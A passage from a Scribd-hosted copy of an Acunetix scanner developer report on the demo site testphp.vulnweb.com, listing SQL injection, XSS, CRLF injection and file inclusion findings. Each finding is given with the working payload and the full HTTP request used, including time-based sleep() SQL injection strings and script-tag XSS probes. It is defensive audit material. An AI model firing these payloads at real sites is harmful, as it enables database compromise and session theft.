KEMBAR78
Developer Example | PDF | Http Cookie | Microsoft Sql Server
0% found this document useful (0 votes)
1K views87 pages

Developer Example

The document summarizes the results of a web security scan on http://testphp.vulnweb.com. It found 127 total alerts, including 51 high severity issues. Specifically, it detected blind SQL injection vulnerabilities in several files accepting user inputs, which could allow attackers to compromise the backend database or deface the website. The report provides technical details on each vulnerability found and recommends fixes.

Uploaded by

hardiron
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
1K views87 pages

Developer Example

The document summarizes the results of a web security scan on http://testphp.vulnweb.com. It found 127 total alerts, including 51 high severity issues. Specifically, it detected blind SQL injection vulnerabilities in several files accepting user inputs, which could allow attackers to compromise the backend database or deface the website. The report provides technical details on each vulnerability found and recommends fixes.

Uploaded by

hardiron
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 87

Web Security Scan 10 November, 2013

Developer Report

Scan of http://testphp.vulnweb.com
Scan details
Scan information Start time Finish time Scan time Profile Server information Responsive Server banner Server OS Server technologies Threat level Acunetix Threat Level 3 One or more high-severity type vulnerabilities have been discovered by the scanner. A malicious user can exploit these vulnerabilities and compromise the backend database and/or deface your website. 10-11-2013 17:16:39 10-11-2013 17:21:46 5 minutes, 7 seconds Default True nginx/1.4.1 Unknown PHP

Alerts distribution Total alerts found High Medium Low Informational 127 51 40 9 27

Knowledge base
List of file extensions File extensions can provide information on what technologies are being used on this website. List of file extensions detected: - php => 27 file(s) - css => 3 file(s) - swf => 1 file(s) - fla => 1 file(s) - htaccess => 1 file(s) - xml => 7 file(s) - tn => 8 file(s) - LOG => 1 file(s) - bak => 2 file(s) - txt => 2 file(s) - html => 2 file(s) - iml => 1 file(s) - sql => 1 file(s) - Log => 1 file(s)

List of client scripts These files contain Javascript code referenced from the website. websecurityscan.eu 2

- /medias/js/common_functions.js

List of files with inputs These files have at least one input (GET or POST). - /search.php - 1 inputs - /hpp - 1 inputs - /hpp/params.php - 2 inputs - /cart.php - 1 inputs - /artists.php - 1 inputs - /userinfo.php - 1 inputs - /guestbook.php - 1 inputs - /AJAX/infoartist.php - 1 inputs - /AJAX/infocateg.php - 1 inputs - /AJAX/infotitle.php - 1 inputs - /AJAX/showxml.php - 1 inputs - /product.php - 1 inputs - /showimage.php - 2 inputs - /listproducts.php - 2 inputs - /redir.php - 1 inputs - /secured/newuser.php - 1 inputs - /comment.php - 3 inputs

List of external hosts These hosts were linked from this website but they were not scanned because they are not listed in the list of hosts allowed.(Settings->Scanners settings->Scanner->List of hosts allowed). - www.acunetix.com - www.eclectasy.com - download.macromedia.com - blog.mindedsecurity.com

List of email addresses List of all email addresses found on this host. - wasp@acunetix.com - wvs@acunetix.com

Alerts summary
Blind SQL Injection Affects /AJAX/infoartist.php /AJAX/infocateg.php /AJAX/infotitle.php /artists.php /listproducts.php /product.php /search.php /secured/newuser.php /userinfo.php websecurityscan.eu Variation s 1 1 1 1 2 1 2 1 2 3

CRLF injection/HTTP response splitting Affects /redir.php Cross site scripting Affects /showimage.php Cross site scripting (verified) Affects /comment.php /guestbook.php /hpp/ /hpp/params.php /listproducts.php /search.php /secured/newuser.php File inclusion Affects /showimage.php HTTP parameter pollution Affects /hpp/ PHP allow_url_fopen enabled Affects /secured/phpinfo.php Script source code disclosure Affects /showimage.php Server side request forgery Affects /showimage.php SQL injection Affects /AJAX/infoartist.php /AJAX/infocateg.php /AJAX/infotitle.php /artists.php /product.php /search.php /userinfo.php Variation s 1 1 1 1 1 1 2 Variation s 2 Variation s 1 Variation s 1 Variation s 1 Variation s 2 Variation s 1 2 3 2 2 1 6 Variation s 2 Variation s 1

websecurityscan.eu

SQL injection (verified) Affects /listproducts.php /secured/newuser.php Weak password Affects /userinfo.php .htaccess file readable Affects /Mod_Rewrite_Shop Application error message Affects /listproducts.php /secured/newuser.php /showimage.php Backup files Affects /index.bak /index.zip Directory listing Affects /.idea /.idea/scopes /admin /CVS /Flash /images /Mod_Rewrite_Shop/images /pictures /Templates Error message on page Affects /pictures/path-disclosure-unix.html HTML form without CSRF protection Affects / /comment.php /guestbook.php /hpp (914f51fea3c42cbd541a6953a8b115a4) /login.php /signup.php Variation s 1 1 1 1 1 1 Variation s 1 Variation s 1 1 1 1 1 1 1 1 1 Variation s 1 1 Variation s 4 2 3 Variation s 1 Variation s 1 Variation s 2 1

websecurityscan.eu

Insecure crossdomain.xml file Affects Web Server JetBrains .idea project directory Affects / PHP errors enabled Affects /secured/phpinfo.php PHP open_basedir is not set Affects /secured/phpinfo.php PHPinfo page found Affects /secured/phpinfo.php Source code disclosure Affects /index.bak /pictures/wp-config.bak URL redirection Affects /redir.php User credentials are sent in clear text Affects /login.php /signup.php WS_FTP log file found Affects /pictures//WS_FTP.LOG Clickjacking: X-Frame-Options header missing Affects Web Server Hidden form input named price was found Affects /product.php (21bc3e21f408d9fb4afa8f6848e81f57) Login page password-guessing attack Affects /userinfo.php websecurityscan.eu Variation s 1 6 Variation s 1 Variation s 1 Variation s 1 Variation s 1 1 Variation s 1 Variation s 1 1 Variation s 1 Variation s 1 Variation s 1 Variation s 1 Variation s 2

Possible sensitive directories Affects /admin /CVS /secured Possible sensitive files Affects /hpp/test.php /Mod_Rewrite_Shop/.htaccess Possible virtual host found Affects localhost Broken links Affects /medias/css/main.css /medias/js/common_functions.js /Mod_Rewrite_Shop/Details/color-printer/3 /Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1 /Mod_Rewrite_Shop/Details/web-camera-a4tech/2 /privacy.php Email address found Affects / /artists.php /cart.php /categories.php /disclaimer.php /guestbook.php /index.bak /index.php /listproducts.php /login.php /product.php /search.php /signup.php /Templates/main_dynamic_template.dwt.php GHDB: Sablotron error message Affects /pictures/path-disclosure-unix.html Password type input with auto-complete enabled Affects /login.php /signup.php Variation s 1 2 Variation s 1 Variation s 1 1 1 1 1 1 1 1 1 1 1 1 1 1 Variation s 1 1 1 1 1 1 Variation s 1 Variation s 1 1 Variation s 1 1 1

websecurityscan.eu

Possible internal IP address disclosure Affects /pictures/ipaddresses.txt Possible server path disclosure (Unix) Affects /pictures/path-disclosure-unix.html Possible username or password disclosure Affects /pictures/credentials.txt Variation s 1 Variation s 1 Variation s 1

websecurityscan.eu

Alert details
Blind SQL Injection
Severity High Type Validation Reported by module Scripting (Blind_Sql_Injection.script) Description This script is possibly vulnerable to SQL Injection attacks. SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't properly filter out dangerous characters. This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable. Impact An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use sub selects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell commands on the underlying operating system. Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine. Recommendation Your script should filter metacharacters from user input. Check detailed information for more information about fixing this vulnerability. References SQL Injection Walkthrough OWASP PHP Top 5 How to check for SQL injection vulnerabilities OWASP Injection Flaws VIDEO: SQL Injection tutorial Acunetix SQL Injection Attack Affected items /AJAX/infoartist.php Details URL encoded GET input id was set to 3 AND 3*2*1=6 AND 403=403 Tests performed: - 0+0+0+3 => TRUE - 0+403*398+3 => FALSE - 13-5-2-999 => FALSE - 13-5-2-3 => TRUE - 13-2*5+0+0+1-1 => TRUE - 13-2*6+0+0+1-1 => FALSE - 3 AND 2+1-1-1=1 AND 403=403 => TRUE - 3 AND 3+1-1-1=1 AND 403=403 => FALSE[/ ... (line truncated) Request headers GET /AJAX/infoartist.php?id=3%20AND%203*2*1%3d6%20AND%20403%3d403 HTTP/1.1 X-Requested-With: XMLHttpRequest Referer: http://testphp.vulnweb.com websecurityscan.eu

Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /AJAX/infocateg.php Details URL encoded GET input id was set to 4 AND 3*2*1=6 AND 602=602 Tests performed: - 0+0+0+4 => TRUE - 0+602*597+4 => FALSE - 14-5-2-999 => FALSE - 14-5-2-3 => TRUE - 14-2*5+0+0+1-1 => TRUE - 14-2*6+0+0+1-1 => FALSE - 4 AND 2+1-1-1=1 AND 602=602 => TRUE - 4 AND 3+1-1-1=1 AND 602=602 => FALSE[/ ... (line truncated) Request headers GET /AJAX/infocateg.php?id=4%20AND%203*2*1%3d6%20AND%20602%3d602 HTTP/1.1 X-Requested-With: XMLHttpRequest Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /AJAX/infotitle.php Details URL encoded POST input id was set to 7 AND 3*2*1=6 AND 54=54 Tests performed: - 0+0+0+7 => TRUE - 0+54*49+7 => FALSE - 17-5-2-999 => FALSE - 17-5-2-3 => TRUE - 17-2*5+0+0+1-1 => TRUE - 17-2*6+0+0+1-1 => FALSE - 7 AND 2+1-1-1=1 AND 54=54 => TRUE - 7 AND 3+1-1-1=1 AND 54=54 => FALSE[/ ... (line truncated) Request headers POST /AJAX/infotitle.php HTTP/1.1 Content-Length: 38 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* id=7%20AND%203*2*1%3d6%20AND%2054%3d54

websecurityscan.eu

10

/artists.php Details URL encoded GET input artist was set to 3 AND 3*2*1=6 AND 276=276 Tests performed: - 0+0+0+3 => TRUE - 0+276*271+3 => FALSE - 13-5-2-999 => FALSE - 13-5-2-3 => TRUE - 13-2*5+0+0+1-1 => TRUE - 13-2*6+0+0+1-1 => FALSE - 3 AND 2+1-1-1=1 AND 276=276 => TRUE - 3 AND 3+1-1-1=1 AND 276=276 => FAL ... (line truncated) Request headers GET /artists.php?artist=3%20AND%203*2*1%3d6%20AND%20276%3d276 HTTP/1.1 X-Requested-With: XMLHttpRequest Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /listproducts.php Details URL encoded GET input artist was set to if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ Tests performed: - if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/ => 6.022 s - if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/ ... (line truncated) Request headers GET /listproducts.php?artist=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate() %2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/ HTTP/1.1 X-Requested-With: XMLHttpRequest Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /listproducts.php Details URL encoded GET input cat was set to if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ Tests performed: - if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/ => 6.006 s - if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/ => ... (line truncated) Request headers GET /listproducts.php?cat=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2c sleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/ HTTP/1.1 X-Requested-With: XMLHttpRequest Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate websecurityscan.eu 11

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /product.php Details URL encoded GET input pic was set to 4 AND 3*2*1=6 AND 399=399 Tests performed: - 0+0+0+4 => TRUE - 0+399*394+4 => FALSE - 14-5-2-999 => FALSE - 14-5-2-3 => TRUE - 14-2*5+0+0+1-1 => TRUE - 14-2*6+0+0+1-1 => FALSE - 4 AND 2+1-1-1=1 AND 399=399 => TRUE - 4 AND 3+1-1-1=1 AND 399=399 => FALSE[ ... (line truncated) Request headers GET /product.php?pic=4%20AND%203*2*1%3d6%20AND%20399%3d399 HTTP/1.1 X-Requested-With: XMLHttpRequest Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /search.php Details URL encoded POST input searchFor was set to if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ Tests performed: - if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/ => 6.022 s - if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))O ... (line truncated) Request headers POST /search.php?test=query HTTP/1.1 Content-Length: 156 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* goButton=go&searchFor=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2c sleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/ /search.php Details URL encoded GET input test was set to (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ Tests performed: - (select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/ => 3.011 s - (select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v) ... (line truncated) Request headers POST /search.php?test=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)) )v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/ HTTP/1.1 websecurityscan.eu 12

Content-Length: 22 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* goButton=go&searchFor= /secured/newuser.php Details URL encoded POST input uuname was set to -1' OR 3*2*1=6 AND 000858=000858 -Tests performed: - -1' OR 2+858-858-1=0+0+0+1 -- => TRUE - -1' OR 3+858-858-1=0+0+0+1 -- => FALSE - -1' OR 3*2<(0+5+858-858) -- => FALSE - -1' OR 3*2>(0+5+858-858) -- => FALSE - -1' OR 2+1-1-1=1 AND 000858=000858 -- => TRUE - -1' OR 000858=000858 AND ... (line truncated) Request headers POST /secured/newuser.php HTTP/1.1 Content-Length: 235 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* signup=signup&uaddress=3137%20Laguna%20Street&ucc=4111111111111111&uemail=sample%40email .tst&upass=g00dPa%24%24w0rD&upass2=g00dPa%24%24w0rD&uphone=555-666-0606&urname=pjxopdtk& uuname=-1'%20OR%203*2*1%3d6%20AND%20000858%3d000858%20--%20 /userinfo.php Details URL encoded POST input pass was set to -1' OR 3*2*1=6 AND 000389=000389 -Tests performed: - -1' OR 2+389-389-1=0+0+0+1 -- => TRUE - -1' OR 3+389-389-1=0+0+0+1 -- => FALSE - -1' OR 3*2<(0+5+389-389) -- => FALSE - -1' OR 3*2>(0+5+389-389) -- => FALSE - -1' OR 2+1-1-1=1 AND 000389=000389 -- => TRUE - -1' OR 000389=000389 AND 3+ ... (line truncated) Request headers POST /userinfo.php HTTP/1.1 Content-Length: 72 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* pass=-1'%20OR%203*2*1%3d6%20AND%20000389%3d000389%20--%20&uname=uinwgjiq

websecurityscan.eu

13

/userinfo.php Details URL encoded POST input uname was set to -1' OR 3*2*1=6 AND 000821=000821 -Tests performed: - -1' OR 2+821-821-1=0+0+0+1 -- => TRUE - -1' OR 3+821-821-1=0+0+0+1 -- => FALSE - -1' OR 3*2<(0+5+821-821) -- => FALSE - -1' OR 3*2>(0+5+821-821) -- => FALSE - -1' OR 2+1-1-1=1 AND 000821=000821 -- => TRUE - -1' OR 000821=000821 AND 3 ... (line truncated) Request headers POST /userinfo.php HTTP/1.1 Content-Length: 80 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* pass=g00dPa%24%24w0rD&uname=-1'%20OR%203*2*1%3d6%20AND%20000821%3d000821%20--%20

websecurityscan.eu

14

CRLF injection/HTTP response splitting


Severity High Type Validation Reported by module Scripting (CRLF_Injection.script) Description This script is possibly vulnerable to CRLF injection attacks. HTTP headers have the structure "Key: Value", where each line is separated by the CRLF combination. If the user input is injected into the value section without properly escaping/removing CRLF characters it is possible to alter the HTTP headers structure. HTTP Response Splitting is a new application attack technique which enables various new attacks such as web cache poisoning, cross user defacement, hijacking pages with sensitive user information and cross-site scripting (XSS). The attacker sends a single HTTP request that forces the web server to form an output stream, which is then interpreted by the target as two HTTP responses instead of one response. Impact Is it possible for a remote attacker to inject custom HTTP headers. For example, an attacker can inject session cookies or HTML code. This may conduct to vulnerabilities like XSS (cross-site scripting) or session fixation. Recommendation You need to restrict CR(0x13) and LF(0x10) from the user input or properly encode the output in order to prevent the injection of custom HTTP headers. References Introduction to HTTP Response Splitting Acunetix CRLF Injection Attack Whitepaper - HTTP Response Splitting Affected items /redir.php Details URL encoded GET input r was set to SomeCustomInjectedHeader:injected_by_wvs Injected header found: SomeCustomInjectedHeader: injected_by_wvs Request headers GET /redir.php?r=%0d%0a%20SomeCustomInjectedHeader:injected_by_wvs HTTP/1.1 Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */*

websecurityscan.eu

15

Cross site scripting


Severity High Type Validation Reported by module Scripting (Remote_File_Inclusion_XSS.script) Description This script is possibly vulnerable to Cross Site Scripting (XSS) attacks. Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser. Impact Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user. Recommendation Your script should filter metacharacters from user input. References How To: Prevent Cross-Site Scripting in ASP.NET Acunetix Cross Site Scripting Attack VIDEO: How Cross-Site Scripting (XSS) Works The Cross Site Scripting Faq OWASP Cross Site Scripting XSS Annihilation XSS Filter Evasion Cheat Sheet Cross site scripting OWASP PHP Top 5 Affected items /showimage.php Details URL encoded GET input file was set to http://testasp.vulnweb.com/t/xss.html?%00.jpg Request headers GET /showimage.php?file=http://testasp.vulnweb.com/t/xss.html%3f%2500.jpg&size=160 HTTP/1.1 Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /showimage.php Details URL encoded GET input file was set to http://testasp.vulnweb.com/t/xss.html?%00.jpg Request headers GET /showimage.php?file=http://testasp.vulnweb.com/t/xss.html%3f%2500.jpg HTTP/1.1 Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */*

websecurityscan.eu

16

Cross site scripting (verified)


Severity High Type Validation Reported by module Scripting (XSS.script) Description This script is possibly vulnerable to Cross Site Scripting (XSS) attacks. Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser. Impact Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user. Recommendation Your script should filter metacharacters from user input. References Cross site scripting OWASP PHP Top 5 XSS Filter Evasion Cheat Sheet XSS Annihilation The Cross Site Scripting Faq Acunetix Cross Site Scripting Attack VIDEO: How Cross-Site Scripting (XSS) Works OWASP Cross Site Scripting How To: Prevent Cross-Site Scripting in ASP.NET Affected items /comment.php Details URL encoded POST input name was set to <your%20name%20here>'"()&%<ScRiPt >prompt(932125)</ScRiPt> Request headers POST /comment.php HTTP/1.1 Content-Length: 139 Content-Type: application/x-www-form-urlencoded Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* comment=1&name=<your%2520name%2520here>'%22()%26%25<ScRiPt%20>prompt(932125)</ScRiPt>&ph paction=echo%20%24_POST%5bcomment%5d;&Submit=Submit /guestbook.php Details URL encoded POST input name was set to anonymous%20user'"()&%<ScRiPt >prompt(937333)</ScRiPt> Request headers POST /guestbook.php HTTP/1.1 Content-Length: 97 Content-Type: application/x-www-form-urlencoded websecurityscan.eu 17

Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* name=anonymous%2520user'%22()%26%25<ScRiPt%20>prompt(937333)</ScRiPt>&submit=add%20messa ge&text=1 /guestbook.php Details URL encoded POST input text was set to 1'"()&%<ScRiPt >prompt(997862)</ScRiPt> Request headers POST /guestbook.php HTTP/1.1 Content-Length: 95 Content-Type: application/x-www-form-urlencoded Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* name=anonymous%20user&submit=add%20message&text=1'%22()%26%25<ScRiPt%20>prompt(997862)</ ScRiPt> /hpp/ Details URL encoded GET input pp was set to 12" onmouseover=prompt(931944) bad=" The input is reflected inside a tag parameter between double quotes. Request headers GET /hpp/?pp=12%22%20onmouseover%3dprompt(931944)%20bad%3d%22 HTTP/1.1 Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /hpp/ Details URL encoded GET input pp was set to 12" onmouseover=prompt(981161) bad=" The input is reflected inside a tag parameter between double quotes. Request headers GET /hpp/?pp=12%22%20onmouseover%3dprompt(981161)%20bad%3d%22 HTTP/1.1 Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /hpp/ Details URL encoded GET input pp was set to 12" onmouseover=prompt(919966) bad=" The input is reflected inside a tag parameter between double quotes. Request headers GET /hpp/?pp=12%22%20onmouseover%3dprompt(919966)%20bad%3d%22 HTTP/1.1 Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com websecurityscan.eu

18

Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /hpp/params.php Details URL encoded GET input p was set to valid'"()&%<ScRiPt >prompt(962710)</ScRiPt> Request headers GET /hpp/params.php?p=valid'%22()%26%25<ScRiPt%20>prompt(962710)</ScRiPt>&pp=12 HTTP/1.1 Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /hpp/params.php Details URL encoded GET input pp was set to 12'"()&%<ScRiPt >prompt(934293)</ScRiPt> Request headers GET /hpp/params.php?p=valid&pp=12'%22()%26%25<ScRiPt%20>prompt(934293)</ScRiPt> HTTP/1.1 Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /listproducts.php Details URL encoded GET input artist was set to 3'"()&%<ScRiPt >prompt(961759)</ScRiPt> Request headers GET /listproducts.php?artist=3'%22()%26%25<ScRiPt%20>prompt(961759)</ScRiPt> HTTP/1.1 Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /listproducts.php Details URL encoded GET input cat was set to 4'"()&%<ScRiPt >prompt(979126)</ScRiPt> Request headers GET /listproducts.php?cat=4'%22()%26%25<ScRiPt%20>prompt(979126)</ScRiPt> HTTP/1.1 Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /search.php Details URL encoded POST input searchFor was set to 1'"()&%<ScRiPt >prompt(970931)</ScRiPt> Request headers POST /search.php?test=query HTTP/1.1 Content-Length: 69 Content-Type: application/x-www-form-urlencoded Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive websecurityscan.eu 19

Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* goButton=go&searchFor=1'%22()%26%25<ScRiPt%20>prompt(970931)</ScRiPt> /secured/newuser.php Details URL encoded POST input uaddress was set to 3137%20Laguna%20Street'"()&%<ScRiPt >prompt(999592)</ScRiPt> Request headers POST /secured/newuser.php HTTP/1.1 Content-Length: 241 Content-Type: application/x-www-form-urlencoded Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* signup=signup&uaddress=3137%2520Laguna%2520Street'%22()%26%25<ScRiPt%20>prompt(999592)</ ScRiPt>&ucc=4111111111111111&uemail=sample%40email.tst&upass=g00dPa%24%24w0rD&upass2=g00 dPa%24%24w0rD&uphone=555-666-0606&urname=npkmulkd&uuname=npkmulkd /secured/newuser.php Details URL encoded POST input ucc was set to 4111111111111111'"()&%<ScRiPt >prompt(959127)</ScRiPt> Request headers POST /secured/newuser.php HTTP/1.1 Content-Length: 237 Content-Type: application/x-www-form-urlencoded Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* signup=signup&uaddress=3137%20Laguna%20Street&ucc=4111111111111111'%22()%26%25<ScRiPt%20 >prompt(959127)</ScRiPt>&uemail=sample%40email.tst&upass=g00dPa%24%24w0rD&upass2=g00dPa% 24%24w0rD&uphone=555-666-0606&urname=pcwfxsrj&uuname=pcwfxsrj /secured/newuser.php 